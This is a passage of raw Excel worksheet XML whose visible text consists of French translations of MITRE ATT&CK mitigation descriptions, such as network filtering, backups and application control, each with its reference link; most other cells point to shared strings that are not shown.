      </c>
    </row>
    <row r="609" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A609" t="s">
        <v>1821</v>
      </c>
      <c r="B609" s="2" t="s">
        <v>1822</v>
      </c>
      <c r="C609" s="2" t="s">
        <v>1823</v>
      </c>
      <c r="D609" s="2" t="s">
        <v>2639</v>
      </c>
    </row>
    <row r="610" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A610" t="s">
        <v>1824</v>
      </c>
      <c r="B610" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="C610" s="2" t="s">
        <v>1826</v>
      </c>
      <c r="D610" s="2" t="s">
        <v>2640</v>
      </c>
    </row>
    <row r="611" spans="1:4" ht="144" x14ac:dyDescent="0.3">
      <c r="A611" t="s">
        <v>1827</v>
      </c>
      <c r="B611" s="2" t="s">
        <v>1828</v>
      </c>
      <c r="C611" s="2" t="s">
        <v>1829</v>
      </c>
      <c r="D611" s="2" t="s">
        <v>2641</v>
      </c>
    </row>
    <row r="612" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A612" t="s">
        <v>1830</v>
      </c>
      <c r="B612" s="2" t="s">
        <v>1831</v>
      </c>
      <c r="C612" s="2" t="s">
        <v>1832</v>
      </c>
      <c r="D612" s="2" t="s">
        <v>2642</v>
      </c>
    </row>
    <row r="613" spans="1:4" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A613" t="s">
        <v>1833</v>
      </c>
      <c r="B613" s="2" t="s">
        <v>1834</v>
      </c>
      <c r="C613" s="2" t="s">
        <v>1835</v>
      </c>
      <c r="D613" s="2" t="s">
        <v>1834</v>
      </c>
    </row>
    <row r="614" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A614" t="s">
        <v>1836</v>
      </c>
      <c r="B614" s="2" t="s">
        <v>1837</v>
      </c>
      <c r="C614" s="2" t="s">
        <v>1838</v>
      </c>
      <c r="D614" s="2" t="s">
        <v>2643</v>
      </c>
    </row>
    <row r="615" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A615" t="s">
        <v>1839</v>
      </c>
      <c r="B615" s="2" t="s">
        <v>1494</v>
      </c>
      <c r="C615" s="2" t="s">
        <v>1840</v>
      </c>
      <c r="D615" s="2" t="s">
        <v>2541</v>
      </c>
    </row>
    <row r="616" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A616" t="s">
        <v>1841</v>
      </c>
      <c r="B616" s="2" t="s">
        <v>1842</v>
      </c>
      <c r="C616" s="2" t="s">
        <v>1843</v>
      </c>
      <c r="D616" s="2" t="s">
        <v>2644</v>
      </c>
    </row>
    <row r="617" spans="1:4" ht="259.2" x14ac:dyDescent="0.3">
      <c r="A617" t="s">
        <v>1844</v>
      </c>
      <c r="B617" s="2" t="s">
        <v>1845</v>
      </c>
      <c r="C617" s="2" t="s">
        <v>1846</v>
      </c>
      <c r="D617" s="2" t="s">
        <v>2645</v>
      </c>
    </row>
    <row r="618" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A618" t="s">
        <v>1847</v>
      </c>
      <c r="B618" s="2" t="s">
        <v>1848</v>
      </c>
      <c r="C618" s="2" t="s">
        <v>1849</v>
      </c>
      <c r="D618" s="2" t="s">
        <v>2646</v>
      </c>
    </row>
    <row r="619" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A619" t="s">
        <v>1850</v>
      </c>
      <c r="B619" s="2" t="s">
        <v>1851</v>
      </c>
      <c r="C619" s="2" t="s">
        <v>1852</v>
      </c>
      <c r="D619" s="2" t="s">
        <v>2647</v>
      </c>
    </row>
    <row r="620" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A620" t="s">
        <v>1853</v>
      </c>
      <c r="B620" s="2" t="s">
        <v>567</v>
      </c>
      <c r="C620" s="2" t="s">
        <v>1854</v>
      </c>
      <c r="D620" s="2" t="s">
        <v>2263</v>
      </c>
    </row>
    <row r="621" spans="1:4" ht="259.2" x14ac:dyDescent="0.3">
      <c r="A621" t="s">
        <v>1855</v>
      </c>
      <c r="B621" s="2" t="s">
        <v>1856</v>
      </c>
      <c r="C621" s="2" t="s">
        <v>1857</v>
      </c>
      <c r="D621" s="2" t="s">
        <v>2648</v>
      </c>
    </row>
    <row r="622" spans="1:4" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A622" t="s">
        <v>1858</v>
      </c>
      <c r="B622" s="2" t="s">
        <v>1859</v>
      </c>
      <c r="C622" s="2" t="s">
        <v>1860</v>
      </c>
      <c r="D622" s="2" t="s">
        <v>2649</v>
      </c>
    </row>
    <row r="623" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A623" t="s">
        <v>1861</v>
      </c>
      <c r="B623" s="2" t="s">
        <v>1862</v>
      </c>
      <c r="C623" s="2" t="s">
        <v>1863</v>
      </c>
      <c r="D623" s="2" t="s">
        <v>2650</v>
      </c>
    </row>
    <row r="624" spans="1:4" ht="216" x14ac:dyDescent="0.3">
      <c r="A624" t="s">
        <v>1864</v>
      </c>
      <c r="B624" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C624" s="2" t="s">
        <v>1866</v>
      </c>
      <c r="D624" s="2" t="s">
        <v>1865</v>
      </c>
    </row>
    <row r="625" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A625" t="s">
        <v>1867</v>
      </c>
      <c r="B625" s="2" t="s">
        <v>1868</v>
      </c>
      <c r="C625" s="2" t="s">
        <v>1869</v>
      </c>
      <c r="D625" s="2" t="s">
        <v>1868</v>
      </c>
    </row>
    <row r="626" spans="1:4" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A626" t="s">
        <v>1870</v>
      </c>
      <c r="B626" s="2" t="s">
        <v>1871</v>
      </c>
      <c r="C626" s="2" t="s">
        <v>1872</v>
      </c>
      <c r="D626" s="2" t="s">
        <v>2651</v>
      </c>
    </row>
    <row r="627" spans="1:4" ht="216" x14ac:dyDescent="0.3">
      <c r="A627" t="s">
        <v>1873</v>
      </c>
      <c r="B627" s="2" t="s">
        <v>1874</v>
      </c>
      <c r="C627" s="2" t="s">
        <v>1875</v>
      </c>
      <c r="D627" s="2" t="s">
        <v>2652</v>
      </c>
    </row>
    <row r="628" spans="1:4" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A628" t="s">
        <v>1876</v>
      </c>
      <c r="B628" s="2" t="s">
        <v>1877</v>
      </c>
      <c r="C628" s="2" t="s">
        <v>1878</v>
      </c>
      <c r="D628" s="2" t="s">
        <v>2653</v>
      </c>
    </row>
    <row r="629" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A629" t="s">
        <v>1879</v>
      </c>
      <c r="B629" s="2" t="s">
        <v>1434</v>
      </c>
      <c r="C629" s="2" t="s">
        <v>1880</v>
      </c>
      <c r="D629" s="2" t="s">
        <v>1434</v>
      </c>
    </row>
    <row r="630" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A630" t="s">
        <v>1881</v>
      </c>
      <c r="B630" s="2" t="s">
        <v>1882</v>
      </c>
      <c r="C630" s="2" t="s">
        <v>1883</v>
      </c>
      <c r="D630" s="2" t="s">
        <v>2654</v>
      </c>
    </row>
    <row r="631" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A631" t="s">
        <v>1884</v>
      </c>
      <c r="B631" s="2" t="s">
        <v>1885</v>
      </c>
      <c r="C631" s="2" t="s">
        <v>1886</v>
      </c>
      <c r="D631" s="2" t="s">
        <v>2655</v>
      </c>
    </row>
    <row r="632" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A632" t="s">
        <v>1887</v>
      </c>
      <c r="B632" s="2" t="s">
        <v>1888</v>
      </c>
      <c r="C632" s="2" t="s">
        <v>1889</v>
      </c>
      <c r="D632" s="2" t="s">
        <v>2656</v>
      </c>
    </row>
    <row r="633" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A633" t="s">
        <v>1890</v>
      </c>
      <c r="B633" s="2" t="s">
        <v>1891</v>
      </c>
      <c r="C633" s="2" t="s">
        <v>1892</v>
      </c>
      <c r="D633" s="2" t="s">
        <v>2657</v>
      </c>
    </row>
    <row r="634" spans="1:4" ht="288" x14ac:dyDescent="0.3">
      <c r="A634" t="s">
        <v>1893</v>
      </c>
      <c r="B634" s="2" t="s">
        <v>1894</v>
      </c>
      <c r="C634" s="2" t="s">
        <v>1895</v>
      </c>
      <c r="D634" s="2" t="s">
        <v>2658</v>
      </c>
    </row>
    <row r="635" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A635" t="s">
        <v>1896</v>
      </c>
      <c r="B635" s="2" t="s">
        <v>1897</v>
      </c>
      <c r="C635" s="2" t="s">
        <v>1898</v>
      </c>
      <c r="D635" s="2" t="s">
        <v>2659</v>
      </c>
    </row>
    <row r="636" spans="1:4" ht="144" x14ac:dyDescent="0.3">
      <c r="A636" t="s">
        <v>1899</v>
      </c>
      <c r="B636" s="2" t="s">
        <v>1900</v>
      </c>
      <c r="C636" s="2" t="s">
        <v>1901</v>
      </c>
      <c r="D636" s="2" t="s">
        <v>1900</v>
      </c>
    </row>
    <row r="637" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A637" t="s">
        <v>1902</v>
      </c>
      <c r="B637" s="2" t="s">
        <v>1903</v>
      </c>
      <c r="C637" s="2" t="s">
        <v>1904</v>
      </c>
      <c r="D637" s="2" t="s">
        <v>2660</v>
      </c>
    </row>
    <row r="638" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A638" t="s">
        <v>1905</v>
      </c>
      <c r="B638" s="2" t="s">
        <v>1906</v>
      </c>
      <c r="C638" s="2" t="s">
        <v>1907</v>
      </c>
      <c r="D638" s="2" t="s">
        <v>2661</v>
      </c>
    </row>
    <row r="639" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A639" t="s">
        <v>1908</v>
      </c>
      <c r="B639" s="2" t="s">
        <v>1909</v>
      </c>
      <c r="C639" s="2" t="s">
        <v>1910</v>
      </c>
      <c r="D639" s="2" t="s">
        <v>2662</v>
      </c>
    </row>
    <row r="640" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A640" t="s">
        <v>1911</v>
      </c>
      <c r="B640" s="2" t="s">
        <v>1912</v>
      </c>
      <c r="C640" s="2" t="s">
        <v>1913</v>
      </c>
      <c r="D640" s="2" t="s">
        <v>2663</v>
      </c>
    </row>
    <row r="641" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A641" t="s">
        <v>1914</v>
      </c>
      <c r="B641" s="2" t="s">
        <v>1915</v>
      </c>
      <c r="C641" s="2" t="s">
        <v>1916</v>
      </c>
      <c r="D641" s="2" t="s">
        <v>1915</v>
      </c>
    </row>
    <row r="642" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A642" t="s">
        <v>1917</v>
      </c>
      <c r="B642" s="2" t="s">
        <v>1918</v>
      </c>
      <c r="C642" s="2" t="s">
        <v>1919</v>
      </c>
      <c r="D642" s="2" t="s">
        <v>2664</v>
      </c>
    </row>
    <row r="643" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A643" t="s">
        <v>1920</v>
      </c>
      <c r="B643" s="2" t="s">
        <v>597</v>
      </c>
      <c r="C643" s="2" t="s">
        <v>1921</v>
      </c>
      <c r="D643" s="2" t="s">
        <v>2273</v>
      </c>
    </row>
    <row r="644" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A644" t="s">
        <v>1922</v>
      </c>
      <c r="B644" s="2" t="s">
        <v>1923</v>
      </c>
      <c r="C644" s="2" t="s">
        <v>1924</v>
      </c>
      <c r="D644" s="2" t="s">
        <v>2665</v>
      </c>
    </row>
    <row r="645" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A645" t="s">
        <v>1925</v>
      </c>
      <c r="B645" s="2" t="s">
        <v>1926</v>
      </c>
      <c r="C645" s="2" t="s">
        <v>1927</v>
      </c>
      <c r="D645" s="2" t="s">
        <v>2666</v>
      </c>
    </row>
    <row r="646" spans="1:4" ht="144" x14ac:dyDescent="0.3">
      <c r="A646" t="s">
        <v>1928</v>
      </c>
      <c r="B646" s="2" t="s">
        <v>1929</v>
      </c>
      <c r="C646" s="2" t="s">
        <v>1930</v>
      </c>
      <c r="D646" s="2" t="s">
        <v>2667</v>
      </c>
    </row>
    <row r="647" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A647" t="s">
        <v>1931</v>
      </c>
      <c r="B647" s="2" t="s">
        <v>1932</v>
      </c>
      <c r="C647" s="2" t="s">
        <v>1933</v>
      </c>
      <c r="D647" s="2" t="s">
        <v>2668</v>
      </c>
    </row>
    <row r="648" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A648" t="s">
        <v>1934</v>
      </c>
      <c r="B648" s="2" t="s">
        <v>1935</v>
      </c>
      <c r="C648" s="2" t="s">
        <v>1936</v>
      </c>
      <c r="D648" s="2" t="s">
        <v>2669</v>
      </c>
    </row>
    <row r="649" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A649" t="s">
        <v>1937</v>
      </c>
      <c r="B649" s="2" t="s">
        <v>1938</v>
      </c>
      <c r="C649" s="2" t="s">
        <v>1939</v>
      </c>
      <c r="D649" s="2" t="s">
        <v>2670</v>
      </c>
    </row>
    <row r="650" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A650" t="s">
        <v>1940</v>
      </c>
      <c r="B650" s="2" t="s">
        <v>1941</v>
      </c>
      <c r="C650" s="2" t="s">
        <v>1942</v>
      </c>
      <c r="D650" s="2" t="s">
        <v>2671</v>
      </c>
    </row>
    <row r="651" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A651" t="s">
        <v>1943</v>
      </c>
      <c r="B651" s="2" t="s">
        <v>1944</v>
      </c>
      <c r="C651" s="2" t="s">
        <v>1945</v>
      </c>
      <c r="D651" s="2" t="s">
        <v>2672</v>
      </c>
    </row>
    <row r="652" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A652" t="s">
        <v>1946</v>
      </c>
      <c r="B652" s="2" t="s">
        <v>1947</v>
      </c>
      <c r="C652" s="2" t="s">
        <v>1948</v>
      </c>
      <c r="D652" s="2" t="s">
        <v>2673</v>
      </c>
    </row>
    <row r="653" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A653" t="s">
        <v>1949</v>
      </c>
      <c r="B653" s="2" t="s">
        <v>1950</v>
      </c>
      <c r="C653" s="2" t="s">
        <v>1951</v>
      </c>
      <c r="D653" s="2" t="s">
        <v>2674</v>
      </c>
    </row>
    <row r="654" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A654" t="s">
        <v>1952</v>
      </c>
      <c r="B654" s="2" t="s">
        <v>1953</v>
      </c>
      <c r="C654" s="2" t="s">
        <v>1954</v>
      </c>
      <c r="D654" s="2" t="s">
        <v>2675</v>
      </c>
    </row>
    <row r="655" spans="1:4" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A655" t="s">
        <v>1955</v>
      </c>
      <c r="B655" s="2" t="s">
        <v>1956</v>
      </c>
      <c r="C655" s="2" t="s">
        <v>1957</v>
      </c>
      <c r="D655" s="2" t="s">
        <v>1956</v>
      </c>
    </row>
    <row r="656" spans="1:4" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A656" t="s">
        <v>1958</v>
      </c>
      <c r="B656" s="2" t="s">
        <v>1959</v>
      </c>
      <c r="C656" s="2" t="s">
        <v>1960</v>
      </c>
      <c r="D656" s="2" t="s">
        <v>2676</v>
      </c>
    </row>
    <row r="657" spans="1:4" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A657" t="s">
        <v>1961</v>
      </c>
      <c r="B657" s="2" t="s">
        <v>1962</v>
      </c>
      <c r="C657" s="2" t="s">
        <v>1963</v>
      </c>
      <c r="D657" s="2" t="s">
        <v>1962</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <ignoredErrors>
    <ignoredError sqref="D2:D3 D5:D657 E2 E3:E105 E107:E121 E123:E205 E206:E297 E299:E305 E306:E373 E375 E377:E405" calculatedColum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election activeCell="B4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="2" max="2" width="35" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>1964</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>19</v>
      </c>
      <c r="B2" t="s">
        <v>1965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5"/>
  <sheetViews>
    <sheetView topLeftCell="E1" zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A25" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="G1" sqref="G1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="10.6640625" customWidth="1"/>
    <col min="2" max="2" width="36.21875" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="16.44140625" customWidth="1"/>
    <col min="4" max="4" width="13.21875" customWidth="1"/>
    <col min="5" max="5" width="185.6640625" style="2" customWidth="1"/>
    <col min="6" max="6" width="36.21875" style="2" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="185.6640625" style="2" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="15.6" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>1966</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>1967</v>
      </c>
      <c r="E1" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F1" s="3" t="s">
        <v>2103</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2104</v>
      </c>
    </row>
    <row r="2" spans="1:7" ht="31.2" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>1968</v>
      </c>
      <c r="B2" t="s">
        <v>1969</v>
      </c>
      <c r="C2" t="s">
        <v>1970</v>
      </c>
      <c r="D2" t="s">
        <v>1971</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>1972</v>
      </c>
      <c r="F2" s="5" t="s">
        <v>2678</v>
      </c>
      <c r="G2" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des signatures de détection d’intrusion pour bloquer le trafic aux limites du réseau.
https://attack.mitre.org/mitigations/M1031</v>
      </c>
    </row>
    <row r="3" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>1973</v>
      </c>
      <c r="B3" t="s">
        <v>744</v>
      </c>
      <c r="C3" t="s">
        <v>1970</v>
      </c>
      <c r="D3" t="s">
        <v>1971</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>1974</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>2319</v>
      </c>
      <c r="G3" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>L’analyse des vulnérabilités est utilisée pour trouver des vulnérabilités logicielles potentiellement exploitables afin d’y remédier.
https://attack.mitre.org/mitigations/M1016</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>1975</v>
      </c>
      <c r="B4" t="s">
        <v>1976</v>
      </c>
      <c r="C4" t="s">
        <v>1977</v>
      </c>
      <c r="D4" t="s">
        <v>1971</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>1978</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>2679</v>
      </c>
      <c r="G4" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêchez l’accès aux partages de fichiers, l’accès à distance aux systèmes, les services inutiles. Les mécanismes de limitation de l’accès peuvent inclure l’utilisation de concentrateurs de réseau, de passerelles RDP, etc.
https://attack.mitre.org/mitigations/M1035</v>
      </c>
    </row>
    <row r="5" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>1979</v>
      </c>
      <c r="B5" t="s">
        <v>1980</v>
      </c>
      <c r="C5" t="s">
        <v>1977</v>
      </c>
      <c r="D5" t="s">
        <v>1971</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>1981</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>2680</v>
      </c>
      <c r="G5" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez le stockage à distance des journaux de sécurité et des fichiers sensibles dont l’accès peut être mieux contrôlé afin d’éviter l’exposition des données du journal de détection d’intrusion ou des informations sensibles.
https://attack.mitre.org/mitigations/M1029</v>
      </c>
    </row>
    <row r="6" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>1982</v>
      </c>
      <c r="B6" t="s">
        <v>1983</v>
      </c>
      <c r="C6" t="s">
        <v>1977</v>
      </c>
      <c r="D6" t="s">
        <v>1971</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>1984</v>
      </c>
      <c r="F6" s="2" t="s">
        <v>2681</v>
      </c>
      <c r="G6" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des appliances réseau pour filtrer le trafic entrant ou sortant et effectuer un filtrage basé sur le protocole. Configurez le logiciel sur les points de terminaison pour filtrer le trafic réseau.
https://attack.mitre.org/mitigations/M1037</v>
      </c>
    </row>
    <row r="7" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>1985</v>
      </c>
      <c r="B7" t="s">
        <v>1986</v>
      </c>
      <c r="C7" t="s">
        <v>1977</v>
      </c>
      <c r="D7" t="s">
        <v>1971</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>1987</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>2682</v>
      </c>
      <c r="G7" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Restreindre l’utilisation de certains sites Web, bloquer les téléchargements/pièces jointes, bloquer Javascript, restreindre les extensions de navigateur, etc.
https://attack.mitre.org/mitigations/M1021</v>
      </c>
    </row>
    <row r="8" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>1988</v>
      </c>
      <c r="B8" t="s">
        <v>1989</v>
      </c>
      <c r="C8" t="s">
        <v>1977</v>
      </c>
      <c r="D8" t="s">
        <v>1971</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>1990</v>
      </c>
      <c r="F8" s="2" t="s">
        <v>2683</v>
      </c>
      <c r="G8" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêcher les utilisateurs ou les groupes d’installer des logiciels non approuvés.
https://attack.mitre.org/mitigations/M1033</v>
      </c>
    </row>
    <row r="9" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9" t="s">
        <v>1991</v>
      </c>
      <c r="B9" t="s">
        <v>1992</v>
      </c>
      <c r="C9" t="s">
        <v>1993</v>
      </c>
      <c r="D9" t="s">
        <v>1971</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>1994</v>
      </c>
      <c r="F9" s="2" t="s">
        <v>2684</v>
      </c>
      <c r="G9" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Cette atténuation décrit toutes les orientations ou formations données aux développeurs d’applications pour éviter d’introduire des faiblesses de sécurité dont un adversaire peut tirer parti.
https://attack.mitre.org/mitigations/M1013</v>
      </c>
    </row>
    <row r="10" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A10" t="s">
        <v>1995</v>
      </c>
      <c r="B10" t="s">
        <v>1996</v>
      </c>
      <c r="C10" t="s">
        <v>1977</v>
      </c>
      <c r="D10" t="s">
        <v>1971</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>1997</v>
      </c>
      <c r="F10" s="2" t="s">
        <v>2685</v>
      </c>
      <c r="G10" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêcher des utilisateurs ou des groupes d’installer ou d’utiliser du matériel non approuvé sur des systèmes, y compris des périphériques USB.
https://attack.mitre.org/mitigations/M1034</v>
      </c>
    </row>
    <row r="11" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A11" t="s">
        <v>1998</v>
      </c>
      <c r="B11" t="s">
        <v>1999</v>
      </c>
      <c r="C11" t="s">
        <v>1993</v>
      </c>
      <c r="D11" t="s">
        <v>1971</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>2000</v>
      </c>
      <c r="F11" s="2" t="s">
        <v>2686</v>
      </c>
      <c r="G11" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Former les utilisateurs à être conscients des tentatives d’accès ou de manipulation par un adversaire afin de réduire le risque de spearphishing, d’ingénierie sociale et d’autres techniques impliquant une interaction avec l’utilisateur.
https://attack.mitre.org/mitigations/M1017</v>
      </c>
    </row>
    <row r="12" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>2001</v>
      </c>
      <c r="B12" t="s">
        <v>2002</v>
      </c>
      <c r="C12" t="s">
        <v>1977</v>
      </c>
      <c r="D12" t="s">
        <v>1971</v>
      </c>
      <c r="E12" s="2" t="s">
        <v>2003</v>
      </c>
      <c r="F12" s="2" t="s">
        <v>2687</v>
      </c>
      <c r="G12" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Configurez le contrôle de compte d’utilisateur Windows pour réduire le risque que des adversaires obtiennent un accès élevé aux processus.
https://attack.mitre.org/mitigations/M1052</v>
      </c>
    </row>
    <row r="13" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A13" t="s">
        <v>2004</v>
      </c>
      <c r="B13" t="s">
        <v>2005</v>
      </c>
      <c r="C13" t="s">
        <v>1977</v>
      </c>
      <c r="D13" t="s">
        <v>1971</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>2006</v>
      </c>
      <c r="F13" s="2" t="s">
        <v>2688</v>
      </c>
      <c r="G13" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Apportez des modifications de configuration liées au système d’exploitation ou à une caractéristique commune du système d’exploitation qui entraînent un renforcement du système par rapport aux techniques.
https://attack.mitre.org/mitigations/M1028</v>
      </c>
    </row>
    <row r="14" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A14" t="s">
        <v>2007</v>
      </c>
      <c r="B14" t="s">
        <v>2008</v>
      </c>
      <c r="C14" t="s">
        <v>2009</v>
      </c>
      <c r="D14" t="s">
        <v>1971</v>
      </c>
      <c r="E14" s="2" t="s">
        <v>2010</v>
      </c>
      <c r="F14" s="2" t="s">
        <v>2689</v>
      </c>
      <c r="G14" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Effectuez et stockez des sauvegardes de données à partir des systèmes de l’utilisateur final et des serveurs critiques. Assurez-vous que les systèmes de sauvegarde et de stockage sont renforcés et séparés du réseau de l’entreprise afin d’éviter toute compromission.
https://attack.mitre.org/mitigations/M1053</v>
      </c>
    </row>
    <row r="15" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15" t="s">
        <v>2011</v>
      </c>
      <c r="B15" t="s">
        <v>2012</v>
      </c>
      <c r="C15" t="s">
        <v>1977</v>
      </c>
      <c r="D15" t="s">
        <v>1971</v>
      </c>
      <c r="E15" s="2" t="s">
        <v>2013</v>
      </c>
      <c r="F15" s="2" t="s">
        <v>2690</v>
      </c>
      <c r="G15" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Bloquer l’exécution de code sur un système par le biais du contrôle d’application et/ou du blocage de script.
https://attack.mitre.org/mitigations/M1038</v>
      </c>
    </row>
    <row r="16" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A16" t="s">
        <v>2014</v>
      </c>
      <c r="B16" t="s">
        <v>2015</v>
      </c>
      <c r="C16" t="s">
        <v>1977</v>
      </c>
      <c r="D16" t="s">
        <v>1971</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>2016</v>
      </c>
      <c r="F16" s="2" t="s">
        <v>2691</v>
      </c>
      <c r="G16" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utiliser des fonctionnalités pour empêcher l’accès réussi aux informations d’identification par des adversaires ; y compris le blocage des formes de dumping d’informations d’identification.
https://attack.mitre.org/mitigations/M1043</v>
      </c>
    </row>
